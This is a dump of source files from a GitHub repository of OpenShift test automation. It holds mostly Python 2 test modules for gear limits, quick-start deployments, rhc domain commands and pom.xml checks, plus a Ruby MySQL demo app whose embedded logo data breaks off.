self.steps.append(testcase.TestCaseStep(\"Verify limits in %s\"%self.res_limit_file,\n self.verify_limits,\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def cgsnapshot(self):\n uuid = OSConf.get_app_uuid(self.app_name)\n cmd=\"cgsnapshot -s | awk '/group libra\\/%s/{yes=1} /^}/{if(yes==1) yes=0} {if(yes==1) print $0}'\"%uuid\n (status, output) = common.run_remote_cmd_as_root(cmd)\n if status == 0:\n obj = re.search(r\"memory.limit_in_bytes=\\\"536870912\", output, re.MULTILINE)\n obj2 = re.search(r\"memory.memsw.limit_in_bytes=\\\"641728512\", output, re.MULTILINE)\n if obj and obj2:\n return 0\n else:\n print \"ERROR: Unable to verify memory limits.\"\n return 1\n return 1\n\n def repquota(self):\n cmd = \"repquota /var/ | awk '/^%s/{ print $5 }' \"%OSConf.get_app_uuid(self.app_name)\n (status, output) = common.run_remote_cmd_as_root(cmd)\n obj = re.search(r\"1048576\", output)\n if obj:\n return 0\n return 1\n\n def verify_limits(self):\n cmd = \"grep -c -e 'quota_blocks=1048576' -e 'memory_limit_in_bytes=1073741824' -e 'memory_memsw_limit_in_bytes=1178599424' '%s' && echo PASS\"%self.res_limit_file\n\n (status, output) = common.run_remote_cmd_as_root(cmd)\n obj = re.search(r\"PASS\", output)\n if (obj):\n return 0\n return 1\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ChangeStdGear)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of change_std_gear.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5715978741645813, "alphanum_fraction": 0.5757455825805664, "avg_line_length": 32.09150314331055, "blob_id": "9eb528f989d24fb603fd6836769d8739649916b0", "content_id": "74f0fbb8e57cc092c5557817b7403de23632dd6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5063, "license_type": "no_license", "max_line_length": 114, "num_lines": 153, "path": "/automation/open/testmodules/RT/quick_start/quick_start_test.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\[email protected]\nMay 29, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport re\nimport json\nfrom pycurl import Curl\nfrom pycurl import URL\nfrom pycurl import WRITEFUNCTION\nfrom shutil import rmtree\nfrom time import sleep\nfrom StringIO import StringIO\n\nclass QuickStartTest(rhtest.Test):\n \"\"\"\n This is the super-class for OpenShift quick-start testing.\n \n If you need something specific in your sub-class, then you have to override the\n appropriate method.\n \"\"\"\n\n def get_github_repo_name(self):\n \"\"\"Returns reponame on GitHub\"\"\"\n return re.split(r'[/]', re.sub(r'\\.git$', '', self.config.git_upstream_url))[-1]\n\n def get_git_branch_name(self):\n \"\"\"Return the branch name should be used. If there's dev/typeless branch available we should use that one.\n # Retrieving info\n self.info(\"Repo name: \" + self.get_github_repo_name())\n github_response = StringIO()\n github = Curl()\n github.setopt(URL, \"https://api.github.com/repos/openshift/%s/branches\" % self.get_github_repo_name())\n github.setopt(WRITEFUNCTION, github_response.write)\n github.perform()\n branches = json.loads(github_response.getvalue())\n # Looking for branch 'dev/typeless'\n branch_name_return = \"master\"\n for branch in branches:\n if branch[\"name\"] == \"dev/typeless\":\n branch_name_return = branch[\"name\"]\n break\n self.info(\"We will use branch '%s'\" % branch_name_return)\n return branch_name_return\"\"\"\n\t# The new behaviour is to use master branch\n\treturn \"master\"\n\n def log_info(self, message):\n self.info(\"===========================\")\n self.info(message)\n self.info(\"===========================\")\n \n def initialize(self):\n self.log_info(\"Initializing\")\n\tself.config.application_name = common.getRandomString()\n # General set-up\n common.env_setup() \n # Creating the application\n common.create_app(\n self.config.application_name,\n self.config.application_type,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n clone_repo = True,\n git_repo = \"./\" + self.config.application_name\n )\n \n # Embedding cartridges\n for cartridge in self.config.application_embedded_cartridges:\n common.embed(\n self.config.application_name,\n \"add-\" + cartridge,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd\n )\n \n def finalize(self):\n self.log_info(\"Finalizing\")\n rmtree(\"./%s\" % self.config.application_name)\n \n def pre_configuration_steps(self):\n pass\n \n def configuration_steps(self):\n self.log_info(\"Configuring\")\n branch_name = self.get_git_branch_name()\n # Adding upstream url\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git remote add upstream -m %s %s\" % ( branch_name, self.config.git_upstream_url ),\n \"git pull --no-edit -s recursive -X theirs upstream %s\" % branch_name\n ]\n ret_code = common.command_get_status(\" && \".join(steps))\n self.assert_equal(ret_code, 0, \"Upstream git repo must be pulled successfully\")\n \n def post_configuration_steps(self):\n pass\n \n def pre_deployment_steps(self):\n pass\n \n def deployment_steps(self):\n self.log_info(\"Deploying\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git push\"\n ]\n if self.get_run_mode() == \"OnPremise\":\n ( ret_code, ret_output ) = common.command_getstatusoutput(\" && \".join(steps), False, 1200)\n else:\n ( ret_code, ret_output ) = common.command_getstatusoutput(\" && \".join(steps))\n self.assert_equal(ret_code, 0, \"Git push operation must be successfull\")\n return ( ret_code, ret_output )\n \n def post_deployment_steps(self):\n pass\n \n def verification(self):\n self.log_info(\"Verifying\")\n sleep(30) # Waiting 30 seconds before checking\n ret_code = common.check_web_page_output(\n self.config.application_name,\n self.config.page,\n self.config.page_pattern \n )\n self.assert_equal(ret_code, 0, \"Pattern %s must be found\" % self.config.page_pattern)\n \n def test_method(self):\n #\n # Step 1. Configuration\n #\n self.pre_configuration_steps()\n self.configuration_steps()\n self.post_configuration_steps()\n #\n # Step 2. Deployment\n #\n self.pre_deployment_steps()\n self.deployment_steps()\n self.post_deployment_steps()\n #\n # Step 3. Verification\n #\n self.verification()\n #\n # Everything is fine: PASSED\n #\n return self.passed(self.config.summary)\n" }, { "alpha_fraction": 0.5399761199951172, "alphanum_fraction": 0.5432577729225159, "avg_line_length": 37.09090805053711, "blob_id": "44abee736ccfd62d472bc40b13f23a5fe78e6702", "content_id": "8e553b331e69d12b548d38cebc1f2d9543ecbc99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3352, "license_type": "no_license", "max_line_length": 168, "num_lines": 88, "path": "/automation/open/testmodules/RT/client/rhc_domain.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport common\nimport rhtest\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US1317][UI][CLI]rhc wrapper - rhc domain\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.domain_name = common.get_domain_name()\n\n common.env_setup()\n\n\n def finalize(self):\n #if we are interrupted in the middle of destroying domain...\n common.fix_domain(common.getRandomString(10), self.user_email, self.user_passwd)\n\n\nclass RhcDomain(OpenShiftTest):\n def test_method(self):\n self.add_step(\n \"Help\",\n \"rhc help domain\",\n expect_description = \"Command line should provide the appropriate help message\",\n expect_str = [\n \"Usage: rhc domain\",\n \"List of Actions\", \"\\s+create\", \"\\s+show\", \"\\s+update\", \"\\s+status\", \"\\s+delete\",\n \"Global Options\", \" -l|--rhlogin\", \"-p|--password\", \"-d|--debug\", \"-h|--help\",\n \" --config\" ])\n\n # Covering the full domain namespace life cycle\n for action in [ \"show\", \"update\", \"delete\", \"create\" ]:\n extra_parameters = \"\"\n dependency = \"\"\n # Configuring command line parameters for each action\n if action == \"delete\":\n extra_parameters = \"-n new\" + self.domain_name\n if action == \"update\":\n extra_parameters = \"%s new%s\" % (self.domain_name, self.domain_name)\n\n if action == \"create\":\n extra_parameters = \"-n \" + self.domain_name\n if action == \"status\":\n dependency = \"eval $(ssh-agent) ; ssh-add ~/.ssh/id_rsa && \"\n # Actions are tested with failure and success\n for result in [ \"success\", \"failure\"]:\n if result == \"success\":\n # Return code must be 0 on success\n return_value_expected = 0\n elif result == \"failure\":\n if action == \"show\" or action == \"status\":\n # Skipping failure testing for actions 'show' and 'status'\n continue\n if action == \"create\" or action == \"alter\":\n extra_parameters = extra_parameters + common.getRandomString(20)\n if action == \"show\":\n extra_parameters = extra_parameters + \"-n \" + self.domain_name\n return_value_expected = \"!0\"\n self.add_step(\n \"Action '%s' - %s\" % ( action, result.upper() ),\n \"%s rhc domain %s -l %s -p %s %s %s\" % ( dependency, action, self.user_email, self.user_passwd, extra_parameters, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = \"The action is performed with %s\" % ( result ),\n expect_return = return_value_expected)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcDomain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 20.66666603088379, "blob_id": "1f4e280380c9b5e25cf66e63f0c376b6ff685d44", "content_id": "c5c161223b9ea60c2d19a4f41726b9c672ccb5da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 64, "license_type": "no_license", "max_line_length": 51, "num_lines": 3, "path": "/automation/parallel/run_tests.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\npybot --outputdir results --exclude parallel atest/" }, { "alpha_fraction": 0.6107184886932373, "alphanum_fraction": 0.6166077852249146, "avg_line_length": 28.789474487304688, "blob_id": "fc1a333fde86f99dde808bee8cb1c5bd58da5794", "content_id": "546e17fa93f9542bda70ce74cac5ee7e105eead6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1698, "license_type": "no_license", "max_line_length": 143, "num_lines": 57, "path": "/automation/open/testmodules/RT/client/rhc_help_gear_size.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import common\nimport rhtest\nimport sys\nimport re\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n #self.info(\"[US2001][Runtime][rhc-node] check help page and man page for the gear sizes\")\n self.testcase_summary = \"[US2001][Runtime][rhc-node] check help page and man page for the gear sizes\"\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass RhcHelpGearSize(OpenShiftTest):\n def log_message(self, pattern, status):\n self.info(\"Pattern '%s'... %s\" % ( pattern, status ))\n \n def test_method(self):\n \n self.command = \"rhc app create\"\n self.pattern_list = ['-g', '--gear-size', \"Geari\\s+size\\s+controls\\s+how\\s+much\\s+memory\\s+and\\s+CPU\\s+your\\s+cartridges\\s+can\\s+use.\"]\n \n ( ret_code, output ) = common.command_getstatusoutput('rhc help app create')\n \n # Checking patterns in the output\n missing_patterns = [ ]\n for pattern in self.pattern_list:\n result = \"OK\"\n match = re.search(pattern, output)\n if not match:\n result = \"FAIL\"\n missing_patterns.append(pattern)\n self.log_message(pattern, result)\n\n # Assertion\n self.info('Asserting that the number of missing patterns is 0')\n self.assert_equal(len(missing_patterns), 0)\n\n # Everythng is OK\n return self.passed(\" - \".join([ self.testcase_summary, self.command ]))\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcHelpGearSize)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5889658331871033, "alphanum_fraction": 0.5992357134819031, "avg_line_length": 37.75925827026367, "blob_id": "559838ac00e0519df3af4bc76fc3822cd6febbca", "content_id": "6171dc101dfad8f54037dc8ffc95d497303ca4f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4187, "license_type": "no_license", "max_line_length": 136, "num_lines": 108, "path": "/automation/open/testmodules/RT/cartridge/jboss_improved_pom_xml.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US617] jboss cart pom.xml improvement\nhttps://tcms.engineering.redhat.com/case/122455/\n\"\"\"\nimport os,sys\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US617] jboss cart pom.xml improvement\"\n self.app_name = \"jbosspom\"\n self.app_type = common.app_types[\"jbossas\"]\n self.git_repo = \"./%s\" % (self.app_name)\n\n common.env_setup()\n \n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass JbossImprovedPomXml(OpenShiftTest):\n def test_method(self):\n # 1.Create an app\n self.steps_list.append(testcase.TestCaseStep(\n \"1. Create an jbossas app: %s\" % (self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Check pom.xml file - groupId\n cmd = \"cd %s && cat pom.xml|grep groupId|grep %s\" % (self.git_repo, self.app_name)\n self.steps_list.append( testcase.TestCaseStep(\"2.Check pom.xml file - groupId\",\n cmd,\n expect_description=\"'%s' should be found in the groupId of pom.xml\" % (self.app_name),\n expect_return=0))\n\n # 3.Check pom.xml file - artifactId\n cmd = \"cd %s && cat pom.xml|grep artifactId|grep %s\" % (self.git_repo, self.app_name)\n self.steps_list.append( testcase.TestCaseStep(\"3.Check pom.xml file - artifactId\",\n cmd,\n expect_description=\"'%s' should be found in the artifactId of pom.xml\" % (self.app_name),\n expect_return=0))\n\n # 4.Check pom.xml file - name\n cmd = \"cd %s && cat pom.xml|grep name|grep %s\" % (self.git_repo, self.app_name)\n self.steps_list.append( testcase.TestCaseStep(\"4.Check pom.xml file - name\",\n cmd,\n expect_description=\"'%s' should be found in the name of pom.xml\" % (self.app_name),\n expect_return=0))\n\n # 5.Check pom.xml file - warName\n cmd = \"cd %s && cat pom.xml|grep warName|grep ROOT\" % (self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\"5.Check pom.xml file - warName\",\n cmd,\n expect_description=\"'ROOT' should be found in the warName of pom.xml\",\n expect_return=0))\n\n # 6.Check pom.xml file - outputdirectory\n cmd = \"cd %s && cat pom.xml|grep outputDirectory|grep deployments\" % (self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\n \"6.Check pom.xml file - outputdirectory\",\n cmd,\n expect_description=\"'deployments' should be found in the outputDirectory of pom.xml\",\n expect_return=0))\n\n # 7.Check pom.xml file - project.build.sourceEncoding\n cmd = \"cd %s && cat pom.xml|grep project.build.sourceEncoding|grep UTF-8\" % (self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\n \"7.Check pom.xml file - project.build.sourceEncoding\",\n cmd,\n expect_description=\"'UTF-8' should be found in the project.build.sourceEncoding of pom.xml\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JbossImprovedPomXml)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6324427723884583, "alphanum_fraction": 0.6454198360443115, "avg_line_length": 41.25806427001953, "blob_id": "f21a96733b1b7130ad3a541305841c56d8424600", "content_id": "9506f38b8cbf0746fea3e05c70be4063a0614504", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2620, "license_type": "no_license", "max_line_length": 163, "num_lines": 62, "path": "/automation/open/testmodules/UI/web/US1797_135723.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\n#import unittest, time, re\n#import baseutils\n#import HTMLTestRunner\n\nclass US17971357232(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n self.confirm_link=self.cfg.confirm_url_express\n\n \n def test_u_s17971357232(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user,self.cfg.password)\n if (not baseutils.has_domain(self)):\n baseutils.setup_domain(self)\n if (not baseutils.has_sshkey(self)):\n baseutils.setup_default_sshkey(self)\n\n baseutils.go_to_account_page(self)\n driver.find_element_by_link_text(\"Change your namespace...\").click()\n##\n for t in baseutils.Invalid_input:\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(t)\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.assert_text_equal_by_xpath(self, \"Only letters and numbers are allowed\",\"id('app-errors')/p\")\n time.sleep(2)\n##\n used_domain=self.cfg.exist_domain\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(used_domain)\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.assert_text_equal_by_xpath(self, \"Namespace '%s' already in use. Please choose another.\"%used_domain,\n \"id('domain_name_group')/div/div[1]/p\")\n new_domain=baseutils.get_random_str(10)\n print \"DEBUG:\", new_domain\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(new_domain)\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.wait_element_present_by_link_text(self, \"Change your namespace...\")\n baseutils.assert_text_equal_by_xpath(self, \"http://applicationname\"+u\"\\u2013\"+\"%s.rhcloud.com\"%new_domain, \"id('content')/div[2]/div[1]/section[2]/div[1]\")\n \n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.6349614262580872, "alphanum_fraction": 0.637532114982605, "avg_line_length": 23.3125, "blob_id": "9b354d06005c103031486ec600166fdeffd5f65f", "content_id": "62c20305ad4d6279d75e7e699b4779e467d1b8d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 389, "license_type": "no_license", "max_line_length": 74, "num_lines": 16, "path": "/listenertest/simplelister.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "ROBOT_LISTENER_API_VERSION = 2\n\ndef start_test(name, attrs):\n print 'Executing test %s' % name\n\ndef end_test(name, attrs):\n print ' ******End test %s ***** ' % name\n\ndef start_keyword(name, attrs):\n print 'Executing keyword %s with arguments %s' % (name, attrs['args'])\n\ndef log_file(path):\n print 'Test log available at %s' % path\n\ndef close():\n print 'All tests executed'\n" }, { "alpha_fraction": 0.5727759599685669, "alphanum_fraction": 0.5990313291549683, "avg_line_length": 23.216049194335938, "blob_id": "988569736f200f022409d63e00ff01a38ccd0803", "content_id": "cd195522a8612fef712a94010ec4d000d1b2a1c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 3923, "license_type": "no_license", "max_line_length": 196, "num_lines": 162, "path": "/automation/open/testmodules/RT/cartridge/app_template/mysql/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "require 'rack/lobster'\nrequire 'mysql'\n\nmap '/mysql' do\n content = \"GEAR DNS: \" + ENV['OPENSHIFT_GEAR_DNS'] + \"<br />\"\n begin\n dbh = Mysql.real_connect(ENV['OPENSHIFT_MYSQL_DB_HOST'], ENV['OPENSHIFT_MYSQL_DB_USERNAME'], ENV['OPENSHIFT_MYSQL_DB_PASSWORD'], ENV['OPENSHIFT_APP_NAME'], ENV['OPENSHIFT_MYSQL_DB_PORT'].to_i)\n dbh.query(\"DROP TABLE IF EXISTS ucctalk\")\n dbh.query(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\")\n dbh.query(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\")\n content += \"<p>#{dbh.affected_rows} rows were inserted:</p>\"\n res = dbh.query(\"SELECT * FROM ucctalk\")\n while row = res.fetch_row do\n content += row.join(\", \")+\"<br />\"\n end\n res.free\n rescue MysqlError => e\n content += \"Error code: #{e.errno}\"\n content += \"Error message: #{e.error}\"\n ensure\n dbh.close if dbh\n end\n mysql = proc do |env|\n [200, { \"Content-Type\" => \"text/html\" }, [content]]\n end\n run mysql\nend\n\nmap '/health' do\n health = proc do |env|\n [200, { \"Content-Type\" => \"text/html\" }, [\"1\"]]\n end\n run health\nend\n\nmap '/lobster' do\n run Rack::Lobster.new\nend\n\nmap '/' do\n welcome = proc do |env|\n [200, { \"Content-Type\" => \"text/html\" }, [\"<!doctype html>\n<html lang=\\\"en\\\">\n<head>\n <meta charset=\\\"utf-8\\\">\n <meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge,chrome=1\\\">\n <title>Welcome to OpenShift</title>\n <style>\n html { background: black; }\n body {\n background: #333;\n background: -webkit-linear-gradient(top, black, #666);\n background: -o-linear-gradient(top, black, #666);\n background: -moz-linear-gradient(top, black, #666);\n background: linear-gradient(top, black, #666);\n color: white;\n font-family: 'Liberation Sans', Verdana, Arial, Sans-serif;\n width: 40em;\n margin: 0 auto;\n padding: 3em;\n }\n a {\n color: #bfdce8;\n }\n \n h1 {\n text-transform: uppercase;\n -moz-text-shadow: 2px 2px 2px black;\n -webkit-text-shadow: 2px 2px 2px black;\n text-shadow: 2px 2px 2px black;\n background: #c00;\n width: 22.5em;\n margin: .5em -2em;\n padding: .3em 0 .3em 1.5em;\n position: relative;\n }\n h1:before {\n content: '';\n width: 0;\n height: 0;\n border: .5em solid #900;\n border-left-color: transparent;\n border-bottom-color: transparent;\n position: absolute;\n bottom: -1em;\n left: 0;\n z-index: -1000;\n }\n h1:after {\n content: '';\n width: 0;\n height: 0;\n border: .5em solid #900;\n border-right-color: transparent;\n border-bottom-color: transparent;\n position: absolute;\n bottom: -1em;\n right: 0;\n z-index: -1000;\n }\n h2 { \n text-transform: uppercase; \n margin: 2em 0 .5em;\n }\n \n pre {\n background: black;\n padding: 1em 0 0;\n -webkit-border-radius: 1em;\n -moz-border-radius: 1em;\n border-radius: 1em;\n color: #9cf;\n }\n \n ul { margin: 0; padding: 0; }\n li {\n list-style-type: none;\n padding: .5em 0;\n }\n </style>\n</head>\n<body>\n <img\n alt=\\\"OpenShift logo\\\"\n src=\\\"data:image/png;base64,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\nPHvdQb0sed2lgu+dV/XDk1V0B